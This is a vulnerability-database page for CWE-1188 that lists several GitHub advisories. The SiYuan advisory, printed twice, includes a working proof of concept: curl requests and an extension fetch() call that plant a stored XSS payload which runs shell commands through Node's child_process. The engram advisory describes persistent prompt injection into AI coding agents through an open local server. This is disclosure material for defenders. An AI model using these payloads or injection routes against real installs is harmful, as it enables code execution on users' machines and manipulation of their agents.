CWE-1188
AllowedInitialization of a Resource with an Insecure Default
Abstraction: Base · Status: Incomplete
The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure.
402 vulnerabilities reference this CWE, most recent first.
GHSA-2GQ4-362C-56W9
Vulnerability from github – Published: 2026-06-19 21:32 – Updated: 2026-06-19 21:32Initialization of a resource with an insecure default in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.
{
"affected": [],
"aliases": [
"CVE-2026-50519"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-19T21:17:02Z",
"severity": "MODERATE"
},
"details": "Initialization of a resource with an insecure default in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.",
"id": "GHSA-2gq4-362c-56w9",
"modified": "2026-06-19T21:32:48Z",
"published": "2026-06-19T21:32:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50519"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50519"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2H64-C999-C9R6
Vulnerability from github – Published: 2026-05-08 16:53 – Updated: 2026-06-08 20:11Summary
The kernel stores Attribute View (AV / database) names without any HTML escape, then a render template uses raw strings.ReplaceAll(tpl, "${avName}", nodeAvName) to embed the name in HTML before pushing to all clients via WebSocket. Three independent client paths (render.ts:120 → outerHTML, Title.ts:401 → innerHTML, transaction.ts:559 → innerHTML) consume the value without escaping. Because the main BrowserWindow runs nodeIntegration:true, contextIsolation:false, webSecurity:false (app/electron/main.js:407-411), HTML injection in the renderer becomes Node.js code execution.
Payload is stored on disk under data/storage/av/<id>.json, replicates via every sync transport (S3 / WebDAV / cloud), survives .sy.zip export-import, and triggers for any role (Administrator / Editor / Reader / publish-service Visitor) opening a doc bound to the AV.
Details
Kernel write — no escape. kernel/model/attribute_view.go:3244-3255:
attrView.Name = strings.TrimSpace(operation.Data.(string))
attrView.Name = strings.ReplaceAll(attrView.Name, "\n", " ")
if 512 < utf8.RuneCountInString(attrView.Name) {
attrView.Name = gulu.Str.SubStr(attrView.Name, 512)
}
err = av.SaveAttributeView(attrView) // ← no html.EscapeString
Kernel template — raw replace. kernel/model/attribute_view.go:3242,3283-3284:
const attrAvNameTpl = `<span data-av-id="${avID}" ... class="popover__block">${avName}</span>`
// ...
tpl := strings.ReplaceAll(attrAvNameTpl, "${avID}", nodeAvID)
tpl = strings.ReplaceAll(tpl, "${avName}", nodeAvName) // ← raw
Sink #1 — AV body header → outerHTML. app/src/protyle/render/av/render.ts:120 (returned from genTabHeaderHTML, written via outerHTML at render.ts:596):
<div contenteditable="${editable}" ... data-title="${data.name || ""}" ...>${data.name || ""}</div>
// ...
e.firstElementChild.outerHTML = `<div class="av__container">${genTabHeaderHTML(...)}...</div>`;
Same pattern in kanban/render.ts:227 and gallery/render.ts:142.
Sink #2 — Doc title attribute strip → innerHTML. app/src/protyle/header/Title.ts:396-403:
response.data.attrViews.forEach((item: { id: string, name: string }) => {
avTitle += `<span data-av-id="${item.id}" ... class="popover__block">${item.name}</span> `;
});
nodeAttrHTML += `<div class="protyle-attr--av">...${avTitle}</div>`;
this.element.querySelector(".protyle-attr").innerHTML = nodeAttrHTML;
Sink #3 — WebSocket updateAttrs push → innerHTML. app/src/protyle/wysiwyg/transaction.ts:549-562,659:
const escapeHTML = Lute.EscapeHTMLStr(data.new[key]);
if (key === "bookmark") { bookmarkHTML = `...${escapeHTML}...`; }
else if (key === "name") { nameHTML = `...${escapeHTML}...`; }
else if (key === "alias") { aliasHTML = `...${escapeHTML}...`; }
else if (key === "memo") { memoHTML = `...${escapeHTML}...`; }
else if (key === "custom-avs" && data.new["av-names"]) {
avHTML = `<div class="protyle-attr--av">...${data.new["av-names"]}</div>`;
// ^^^^^^^^^^^^^^^^^^^^^^^^ raw, unlike the four siblings above
}
// ...
attrElement.innerHTML = nodeAttrHTML + Constants.ZWSP;
The four sibling cases use Lute.EscapeHTMLStr — proving the team knows the right pattern; only av-names was missed.
Renderer posture — RCE multiplier. app/electron/main.js:407-411:
webPreferences: {
nodeIntegration: true, webviewTag: true,
webSecurity: false, contextIsolation: false,
}
Reachability. Route /api/transactions setAttrViewName requires CheckAuth + CheckAdminRole + CheckReadonly. On default install (Conf.AccessAuthCode == ""), kernel/model/session.go:261-287 auto-grants Administrator to local-origin requests. The Origin check accepts localhost / loopback only but chrome-extension:// is explicitly allowlisted (session.go:277), so any installed browser extension calls the API as admin. Local clients with no Origin header (CLI tools) also pass.
Suggested fix
kernel/model/attribute_view.go getAvNames(line 3283-3284): replace the twostrings.ReplaceAllcalls withtemplate.HTMLEscapeString(nodeAvName)for the${avName}substitution.transaction.ts:559: wrap withLute.EscapeHTMLStrto match siblings at lines 549-557.render.ts:120: useLute.EscapeHTMLStr(data.name)for bothdata-title=and the text content.Title.ts:396: escapeitem.nameviaLute.EscapeHTMLStranditem.idviaescapeAttr.- (Defense-in-depth) Switch the main BrowserWindow to
contextIsolation: truewith a preload bridge — caps every future renderer XSS at "DOM only," not RCE.
Reproduction (copy-paste-ready)
Tested on Linux/macOS with SiYuan v3.6.5 (re-verified against master HEAD on 2026-05-03). Windows users: replace python3 with py and use Git Bash / WSL for the shell snippets, or translate to PowerShell.
Prereqs
- Install SiYuan v3.6.5 from https://github.com/siyuan-note/siyuan/releases. Launch it once so the workspace at
~/SiYuanWorkspaceis initialized. Do not set an Access Authorization Code (default). - Verify the kernel responds:
sh curl -s http://127.0.0.1:6806/api/system/versionExpected output (single line of JSON):json {"code":0,"msg":"","data":"3.6.5"} - Pin shell variables for the rest of the PoC: ```sh API=http://127.0.0.1:6806 WS=~/SiYuanWorkspace # adjust if your workspace lives elsewhere
NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \
-H 'Content-Type: application/json' -d '{}' \
| python3 -c 'import sys,json; print(json.load(sys.stdin)["data"]["notebooks"][0]["id"])')
echo "Using notebook: $NOTEBOOK_ID"
``
Expected: a 14-digit-timestamp +-7charsID like20240101120000-abc1234`. If you get an empty string, you have no notebooks — open SiYuan and click "New notebook" once.
Step A — Create the AV via the SiYuan UI (one-time, ~10 seconds)
The kernel's setAttrViewName requires the AV file to already exist on disk (av.ParseAttributeView returns an error otherwise). The simplest way to create one is via the editor:
- Open SiYuan. In any document, type
/databaseand press Enter (or open the slash-command menu and pick Database). - The editor inserts an Attribute View block. The kernel writes a JSON file to
<workspace>/data/storage/av/<av-id>.json. -
Capture the AV ID — the most recently written file in that directory:
sh AV_FILE=$(ls -1t "$WS/data/storage/av/"*.json 2>/dev/null | head -1) AV_ID=$(basename "$AV_FILE" .json) echo "AV_ID: $AV_ID"Expected: same 14-digit-timestamp +-7charsshape, e.g.20260503160000-aaaaaaa. If empty, the AV file wasn't created — repeat the UI step. (If your workspace already has many AV files, this picks the newest by mtime; alternatively right-click the inserted database block in SiYuan → Inspect Element to read itsdata-av-idattribute.) -
Capture the doc ID that hosts the AV: right-click the doc tab → Copy ID, or read it from the doc's
data-node-idin DevTools (Ctrl+Shift+I). Set:sh DOC_ID=<root-block-id-of-the-doc-containing-the-AV>
Step B — Plant the XSS payload as the AV name
The payload is written directly inside an unquoted heredoc so bash expands $AV_ID while preserving the \" JSON-escape sequences literally. Single-quote chars (') in the inner JS need no escaping inside a JSON string.
curl -s -X POST $API/api/transactions \
-H 'Content-Type: application/json' \
--data-binary @- <<EOF
{
"session": "x",
"app": "siyuan",
"transactions": [{
"doOperations": [{
"action": "setAttrViewName",
"id": "$AV_ID",
"data": "<img src=x onerror=\"require('child_process').exec(process.platform==='win32'?'calc.exe':process.platform==='darwin'?'open -a Calculator':'xcalc')\">"
}],
"undoOperations": []
}]
}
EOF
Expected response:
{"code":0,"msg":"","data":[{"doOperations":[...,"action":"setAttrViewName",...]}]}
Step C — Verify the unescaped storage
python3 -c "import json; print(json.load(open('$WS/data/storage/av/$AV_ID.json'))['name'])"
Expected output (the raw HTML as stored — print does not escape ", so they appear as literal quotes):
<img src=x onerror="require('child_process').exec(process.platform==='win32'?'calc.exe':process.platform==='darwin'?'open -a Calculator':'xcalc')">
Step D — Trigger
In the SiYuan desktop client:
- Switch away from the doc that contains the AV (open another doc, or close the tab).
- Re-open the doc containing the AV (
$DOC_ID). - The AV body header is rendered via
genTabHeaderHTML→outerHTMLatapp/src/protyle/render/av/render.ts:596. The browser parses the<img>tag, fails to loadsrc=x, and firesonerror. - Calculator (or
xcalc/open -a Calculator) launches.
If nothing happens, open DevTools (Ctrl+Shift+I / ⌘⌥I) → Console; you should see the error from the failed src=x load. If the AV is in another doc you haven't opened recently, the cached render may be stale — close all tabs and re-open.
Step E — Browser-extension attack vector (the realistic remote path)
A malicious or compromised installed browser extension's content/background script runs with chrome-extension://<id> Origin, allowlisted by session.go:277. The extension can run Steps B's curl-equivalent via fetch():
// Inside any extension content/background script
fetch('http://127.0.0.1:6806/api/transactions', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
session: 'x', app: 'siyuan',
transactions: [{ doOperations: [{
action: 'setAttrViewName',
id: '<av-id-discovered-via-prior-recon-fetches>',
data: `<img src=x onerror="require('child_process').exec('xcalc')">`
}] }]
})
});
The extension can also enumerate AV IDs by first calling /api/notebook/lsNotebooks, then walking notebook trees.
A page from https://attacker.com is rejected — IsLocalOrigin only matches localhost/loopback. Realistic remote vectors are: browser extensions, localhost-served webpages, shared .sy.zip imports, sync replication from a co-author's compromised device.
Cleanup
# Remove the test doc (also removes the AV binding in the doc)
curl -s -X POST $API/api/filetree/removeDocByID \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}"
# Manually delete the AV file
rm -f $WS/data/storage/av/$AV_ID.json
# Restart SiYuan to clear in-memory state
Impact
- RCE on the victim's desktop with the user's privileges, no extra prompt after the trigger condition is met.
- Persistent — payload survives restart, syncs across devices, rides in
.sy.zipexports and Bazaar templates. - Triggers for any role opening a doc bound to the AV (incl. Reader-role publish viewers).
- After RCE: full filesystem read (incl.
~/.ssh/,~/.aws/credentials, workspaceconf/conf.json— kernel API token + AccessAuthCode hash), persistence (.bashrc/ Startup folder / LaunchAgent), cloud-account pivot. - Attack vectors: browser extensions (
chrome-extension://Origin allowlisted); shared.sy.zipfiles; Bazaar templates; sync peers; co-authors on a shared workspace; publish-service planters infecting Reader viewers.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.0.0-20260421031503-96dfe0bea474"
},
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260512140701-d7b77d945e0d"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44670"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-79",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T16:53:18Z",
"nvd_published_at": "2026-05-14T19:16:38Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe kernel stores Attribute View (AV / database) names without any HTML escape, then a render template uses raw `strings.ReplaceAll(tpl, \"${avName}\", nodeAvName)` to embed the name in HTML before pushing to all clients via WebSocket. Three independent client paths (`render.ts:120` \u2192 `outerHTML`, `Title.ts:401` \u2192 `innerHTML`, `transaction.ts:559` \u2192 `innerHTML`) consume the value without escaping. Because the main BrowserWindow runs `nodeIntegration:true, contextIsolation:false, webSecurity:false` (`app/electron/main.js:407-411`), HTML injection in the renderer becomes Node.js code execution.\n\nPayload is stored on disk under `data/storage/av/\u003cid\u003e.json`, replicates via every sync transport (S3 / WebDAV / cloud), survives `.sy.zip` export-import, and triggers for any role (Administrator / Editor / Reader / publish-service Visitor) opening a doc bound to the AV.\n\n## Details\n\n**Kernel write \u2014 no escape.** `kernel/model/attribute_view.go:3244-3255`:\n```go\nattrView.Name = strings.TrimSpace(operation.Data.(string))\nattrView.Name = strings.ReplaceAll(attrView.Name, \"\\n\", \" \")\nif 512 \u003c utf8.RuneCountInString(attrView.Name) {\n attrView.Name = gulu.Str.SubStr(attrView.Name, 512)\n}\nerr = av.SaveAttributeView(attrView) // \u2190 no html.EscapeString\n```\n\n**Kernel template \u2014 raw replace.** `kernel/model/attribute_view.go:3242,3283-3284`:\n```go\nconst attrAvNameTpl = `\u003cspan data-av-id=\"${avID}\" ... class=\"popover__block\"\u003e${avName}\u003c/span\u003e`\n// ...\ntpl := strings.ReplaceAll(attrAvNameTpl, \"${avID}\", nodeAvID)\ntpl = strings.ReplaceAll(tpl, \"${avName}\", nodeAvName) // \u2190 raw\n```\n\n**Sink #1 \u2014 AV body header \u2192 outerHTML.** `app/src/protyle/render/av/render.ts:120` (returned from `genTabHeaderHTML`, written via outerHTML at `render.ts:596`):\n```ts\n\u003cdiv contenteditable=\"${editable}\" ... data-title=\"${data.name || \"\"}\" ...\u003e${data.name || \"\"}\u003c/div\u003e\n// ...\ne.firstElementChild.outerHTML = `\u003cdiv class=\"av__container\"\u003e${genTabHeaderHTML(...)}...\u003c/div\u003e`;\n```\nSame pattern in `kanban/render.ts:227` and `gallery/render.ts:142`.\n\n**Sink #2 \u2014 Doc title attribute strip \u2192 innerHTML.** `app/src/protyle/header/Title.ts:396-403`:\n```ts\nresponse.data.attrViews.forEach((item: { id: string, name: string }) =\u003e {\n avTitle += `\u003cspan data-av-id=\"${item.id}\" ... class=\"popover__block\"\u003e${item.name}\u003c/span\u003e\u0026nbsp;`;\n});\nnodeAttrHTML += `\u003cdiv class=\"protyle-attr--av\"\u003e...${avTitle}\u003c/div\u003e`;\nthis.element.querySelector(\".protyle-attr\").innerHTML = nodeAttrHTML;\n```\n\n**Sink #3 \u2014 WebSocket `updateAttrs` push \u2192 innerHTML.** `app/src/protyle/wysiwyg/transaction.ts:549-562,659`:\n```ts\nconst escapeHTML = Lute.EscapeHTMLStr(data.new[key]);\nif (key === \"bookmark\") { bookmarkHTML = `...${escapeHTML}...`; }\nelse if (key === \"name\") { nameHTML = `...${escapeHTML}...`; }\nelse if (key === \"alias\") { aliasHTML = `...${escapeHTML}...`; }\nelse if (key === \"memo\") { memoHTML = `...${escapeHTML}...`; }\nelse if (key === \"custom-avs\" \u0026\u0026 data.new[\"av-names\"]) {\n avHTML = `\u003cdiv class=\"protyle-attr--av\"\u003e...${data.new[\"av-names\"]}\u003c/div\u003e`;\n // ^^^^^^^^^^^^^^^^^^^^^^^^ raw, unlike the four siblings above\n}\n// ...\nattrElement.innerHTML = nodeAttrHTML + Constants.ZWSP;\n```\nThe four sibling cases use `Lute.EscapeHTMLStr` \u2014 proving the team knows the right pattern; only `av-names` was missed.\n\n**Renderer posture \u2014 RCE multiplier.** `app/electron/main.js:407-411`:\n```js\nwebPreferences: {\n nodeIntegration: true, webviewTag: true,\n webSecurity: false, contextIsolation: false,\n}\n```\n\n**Reachability.** Route `/api/transactions setAttrViewName` requires `CheckAuth + CheckAdminRole + CheckReadonly`. On default install (`Conf.AccessAuthCode == \"\"`), `kernel/model/session.go:261-287` auto-grants Administrator to local-origin requests. The Origin check accepts `localhost` / loopback only **but `chrome-extension://` is explicitly allowlisted** (`session.go:277`), so any installed browser extension calls the API as admin. Local clients with no Origin header (CLI tools) also pass.\n\n## Suggested fix\n\n1. `kernel/model/attribute_view.go getAvNames` (line 3283-3284): replace the two `strings.ReplaceAll` calls with `template.HTMLEscapeString(nodeAvName)` for the `${avName}` substitution.\n2. `transaction.ts:559`: wrap with `Lute.EscapeHTMLStr` to match siblings at lines 549-557.\n3. `render.ts:120`: use `Lute.EscapeHTMLStr(data.name)` for both `data-title=` and the text content.\n4. `Title.ts:396`: escape `item.name` via `Lute.EscapeHTMLStr` and `item.id` via `escapeAttr`.\n5. *(Defense-in-depth)* Switch the main BrowserWindow to `contextIsolation: true` with a preload bridge \u2014 caps every future renderer XSS at \"DOM only,\" not RCE.\n\n---\n\n## Reproduction (copy-paste-ready)\n\nTested on Linux/macOS with SiYuan v3.6.5 (re-verified against `master` HEAD on 2026-05-03). Windows users: replace `python3` with `py` and use Git Bash / WSL for the shell snippets, or translate to PowerShell.\n\n### Prereqs\n\n1. **Install SiYuan v3.6.5** from https://github.com/siyuan-note/siyuan/releases. Launch it once so the workspace at `~/SiYuanWorkspace` is initialized. Do **not** set an Access Authorization Code (default).\n2. **Verify the kernel responds:**\n ```sh\n curl -s http://127.0.0.1:6806/api/system/version\n ```\n Expected output (single line of JSON):\n ```json\n {\"code\":0,\"msg\":\"\",\"data\":\"3.6.5\"}\n ```\n3. **Pin shell variables** for the rest of the PoC:\n ```sh\n API=http://127.0.0.1:6806\n WS=~/SiYuanWorkspace # adjust if your workspace lives elsewhere\n\n NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \\\n -H \u0027Content-Type: application/json\u0027 -d \u0027{}\u0027 \\\n | python3 -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"notebooks\"][0][\"id\"])\u0027)\n echo \"Using notebook: $NOTEBOOK_ID\"\n ```\n Expected: a 14-digit-timestamp + `-7chars` ID like `20240101120000-abc1234`. If you get an empty string, you have no notebooks \u2014 open SiYuan and click \"New notebook\" once.\n\n### Step A \u2014 Create the AV via the SiYuan UI (one-time, ~10 seconds)\n\nThe kernel\u0027s `setAttrViewName` requires the AV file to already exist on disk (`av.ParseAttributeView` returns an error otherwise). The simplest way to create one is via the editor:\n\n1. Open SiYuan. In any document, type `/database` and press Enter (or open the slash-command menu and pick **Database**).\n2. The editor inserts an Attribute View block. The kernel writes a JSON file to `\u003cworkspace\u003e/data/storage/av/\u003cav-id\u003e.json`.\n3. Capture the AV ID \u2014 the most recently written file in that directory:\n ```sh\n AV_FILE=$(ls -1t \"$WS/data/storage/av/\"*.json 2\u003e/dev/null | head -1)\n AV_ID=$(basename \"$AV_FILE\" .json)\n echo \"AV_ID: $AV_ID\"\n ```\n Expected: same 14-digit-timestamp + `-7chars` shape, e.g. `20260503160000-aaaaaaa`. If empty, the AV file wasn\u0027t created \u2014 repeat the UI step. (If your workspace already has many AV files, this picks the newest by mtime; alternatively right-click the inserted database block in SiYuan \u2192 Inspect Element to read its `data-av-id` attribute.)\n\n4. Capture the doc ID that hosts the AV: right-click the doc tab \u2192 **Copy ID**, or read it from the doc\u0027s `data-node-id` in DevTools (Ctrl+Shift+I). Set:\n ```sh\n DOC_ID=\u003croot-block-id-of-the-doc-containing-the-AV\u003e\n ```\n\n### Step B \u2014 Plant the XSS payload as the AV name\n\nThe payload is written directly inside an unquoted heredoc so bash expands `$AV_ID` while preserving the `\\\"` JSON-escape sequences literally. Single-quote chars (`\u0027`) in the inner JS need no escaping inside a JSON string.\n\n```sh\ncurl -s -X POST $API/api/transactions \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @- \u003c\u003cEOF\n{\n \"session\": \"x\",\n \"app\": \"siyuan\",\n \"transactions\": [{\n \"doOperations\": [{\n \"action\": \"setAttrViewName\",\n \"id\": \"$AV_ID\",\n \"data\": \"\u003cimg src=x onerror=\\\"require(\u0027child_process\u0027).exec(process.platform===\u0027win32\u0027?\u0027calc.exe\u0027:process.platform===\u0027darwin\u0027?\u0027open -a Calculator\u0027:\u0027xcalc\u0027)\\\"\u003e\"\n }],\n \"undoOperations\": []\n }]\n}\nEOF\n```\nExpected response:\n```json\n{\"code\":0,\"msg\":\"\",\"data\":[{\"doOperations\":[...,\"action\":\"setAttrViewName\",...]}]}\n```\n\n### Step C \u2014 Verify the unescaped storage\n\n```sh\npython3 -c \"import json; print(json.load(open(\u0027$WS/data/storage/av/$AV_ID.json\u0027))[\u0027name\u0027])\"\n```\nExpected output (the raw HTML as stored \u2014 `print` does not escape `\"`, so they appear as literal quotes):\n```\n\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(process.platform===\u0027win32\u0027?\u0027calc.exe\u0027:process.platform===\u0027darwin\u0027?\u0027open -a Calculator\u0027:\u0027xcalc\u0027)\"\u003e\n```\n\n### Step D \u2014 Trigger\n\nIn the SiYuan desktop client:\n\n1. Switch away from the doc that contains the AV (open another doc, or close the tab).\n2. Re-open the doc containing the AV (`$DOC_ID`).\n3. The AV body header is rendered via `genTabHeaderHTML` \u2192 `outerHTML` at `app/src/protyle/render/av/render.ts:596`. The browser parses the `\u003cimg\u003e` tag, fails to load `src=x`, and fires `onerror`.\n4. **Calculator (or `xcalc` / `open -a Calculator`) launches.**\n\nIf nothing happens, open DevTools (Ctrl+Shift+I / \u2318\u2325I) \u2192 Console; you should see the error from the failed `src=x` load. If the AV is in another doc you haven\u0027t opened recently, the cached render may be stale \u2014 close all tabs and re-open.\n\n### Step E \u2014 Browser-extension attack vector (the realistic remote path)\n\nA malicious or compromised installed browser extension\u0027s content/background script runs with `chrome-extension://\u003cid\u003e` Origin, allowlisted by `session.go:277`. The extension can run Steps B\u0027s curl-equivalent via `fetch()`:\n```js\n// Inside any extension content/background script\nfetch(\u0027http://127.0.0.1:6806/api/transactions\u0027, {\n method: \u0027POST\u0027,\n headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n body: JSON.stringify({\n session: \u0027x\u0027, app: \u0027siyuan\u0027,\n transactions: [{ doOperations: [{\n action: \u0027setAttrViewName\u0027,\n id: \u0027\u003cav-id-discovered-via-prior-recon-fetches\u003e\u0027,\n data: `\u003cimg src=x onerror=\"require(\u0027child_process\u0027).exec(\u0027xcalc\u0027)\"\u003e`\n }] }]\n })\n});\n```\nThe extension can also enumerate AV IDs by first calling `/api/notebook/lsNotebooks`, then walking notebook trees.\n\nA page from `https://attacker.com` is rejected \u2014 `IsLocalOrigin` only matches localhost/loopback. Realistic remote vectors are: **browser extensions**, **localhost-served webpages**, **shared `.sy.zip` imports**, **sync replication from a co-author\u0027s compromised device**.\n\n### Cleanup\n\n```sh\n# Remove the test doc (also removes the AV binding in the doc)\ncurl -s -X POST $API/api/filetree/removeDocByID \\\n -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\"\n\n# Manually delete the AV file\nrm -f $WS/data/storage/av/$AV_ID.json\n\n# Restart SiYuan to clear in-memory state\n```\n\n## Impact\n\n- **RCE on the victim\u0027s desktop** with the user\u0027s privileges, no extra prompt after the trigger condition is met.\n- **Persistent** \u2014 payload survives restart, syncs across devices, rides in `.sy.zip` exports and Bazaar templates.\n- **Triggers for any role** opening a doc bound to the AV (incl. Reader-role publish viewers).\n- After RCE: full filesystem read (incl. `~/.ssh/`, `~/.aws/credentials`, workspace `conf/conf.json` \u2014 kernel API token + AccessAuthCode hash), persistence (`.bashrc` / Startup folder / LaunchAgent), cloud-account pivot.\n- **Attack vectors:** browser extensions (`chrome-extension://` Origin allowlisted); shared `.sy.zip` files; Bazaar templates; sync peers; co-authors on a shared workspace; publish-service planters infecting Reader viewers.",
"id": "GHSA-2h64-c999-c9r6",
"modified": "2026-06-08T20:11:15Z",
"published": "2026-05-08T16:53:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-2h64-c999-c9r6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44670"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "SiYuan Affected by Stored XSS via Attribute View Name to Electron Renderer RCE"
}
GHSA-2MVJ-Q2Q3-WXJV
Vulnerability from github – Published: 2024-02-20 15:31 – Updated: 2025-07-29 13:04In Liferay Portal 7.2.0 through 7.4.3.25, and older unsupported versions, and Liferay DXP 7.4 before update 26, 7.3 before update 5, 7.2 before fix pack 19, and older unsupported versions the default value of the portal property http.header.version.verbosity is set to full, which allows remote attackers to easily identify the version of the application that is running and the vulnerabilities that affect that version via 'Liferay-Portal` response header.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay.portal:release.portal.bom"
},
"ranges": [
{
"events": [
{
"introduced": "7.2.0"
},
{
"fixed": "7.4.3.26-ga26"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay.portal:release.dxp.bom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.2.10.fp19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay.portal:release.dxp.bom"
},
"ranges": [
{
"events": [
{
"introduced": "7.3.0"
},
{
"fixed": "7.3.10.u5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay.portal:release.dxp.bom"
},
"ranges": [
{
"events": [
{
"introduced": "7.4.0"
},
{
"fixed": "7.4.13.u26"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-26267"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-29T13:04:50Z",
"nvd_published_at": "2024-02-20T13:15:08Z",
"severity": "MODERATE"
},
"details": "In Liferay Portal 7.2.0 through 7.4.3.25, and older unsupported versions, and Liferay DXP 7.4 before update 26, 7.3 before update 5, 7.2 before fix pack 19, and older unsupported versions the default value of the portal property `http.header.version.verbosity` is set to `full`, which allows remote attackers to easily identify the version of the application that is running and the vulnerabilities that affect that version via \u0027Liferay-Portal` response header.",
"id": "GHSA-2mvj-q2q3-wxjv",
"modified": "2025-07-29T13:04:50Z",
"published": "2024-02-20T15:31:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26267"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/00750dade0cc81efc380fcc6d7e2f58060c4ad95"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/0e881cac66db14a11673c0352def6df04f77d35c"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/9658cec331feaaaad8bf93c6f65e1768a1f43ae2"
},
{
"type": "PACKAGE",
"url": "https://github.com/liferay/liferay-portal"
},
{
"type": "WEB",
"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26267"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Liferay Portal and Liferay DXP HTTP Header Can Expose Versions"
}
GHSA-2PV5-24RH-CJH6
Vulnerability from github – Published: 2022-05-24 16:44 – Updated: 2024-04-04 00:02In the configuration of NFC modules on certain devices, there is a possible failure to distinguish individual devices due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-122034690.
{
"affected": [],
"aliases": [
"CVE-2019-2041"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-04-19T20:29:00Z",
"severity": "HIGH"
},
"details": "In the configuration of NFC modules on certain devices, there is a possible failure to distinguish individual devices due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-122034690.",
"id": "GHSA-2pv5-24rh-cjh6",
"modified": "2024-04-04T00:02:15Z",
"published": "2022-05-24T16:44:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-2041"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2019-04-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2R2P-4CGF-HV7H
Vulnerability from github – Published: 2026-04-22 14:52 – Updated: 2026-04-22 14:52Summary
The local HTTP server started by engram server (binding 127.0.0.1:7337 by default) was exposed to any browser origin with no authentication unless ENGRAM_API_TOKEN was explicitly set. Combined with Access-Control-Allow-Origin: * on every response and a body parser that did not require Content-Type: application/json, this allowed a malicious web page the developer visited to:
- Exfiltrate the local knowledge graph via
GET /queryandGET /stats(function names, file layout, recorded decisions/mistakes). - Inject persistent prompt-injection payloads via
POST /learn, which wrotemistake/decisionnodes that were later surfaced as system-reminders to the user's AI coding agent on every future session and file edit.
Severity: High — confidentiality + persistent indirect prompt injection against the user's coding agent.
Affected versions
engramx >= 1.0.0, < 2.0.2 — any version that shipped the HTTP server.
Patched in
engramx@2.0.2
Workarounds (if you cannot upgrade)
- Do not run
engram serverorengram ui. - If developers must, set
ENGRAM_API_TOKENto a long random value and terminate the server before browsing the web.
Remediation (applied in 2.0.2)
- Fail-closed auth on every non-public route — Bearer header or HttpOnly cookie, constant-time comparison, 256-bit auto-generated token at
~/.engram/http-server.token(0600). - Wildcard CORS removed entirely; default is no CORS headers. Opt-in allowlist via
ENGRAM_ALLOWED_ORIGINS. - Host + Origin validation — rejects DNS rebinding and Host spoofing.
Content-Type: application/jsonenforced on mutations — blocks the text/plain CSRF vector./ui?token=bootstrap withSec-Fetch-Sitegate — prevents cross-origin oracle probing.
Credit
Discovered and responsibly disclosed by @gabiudrescu in engram issue #7.
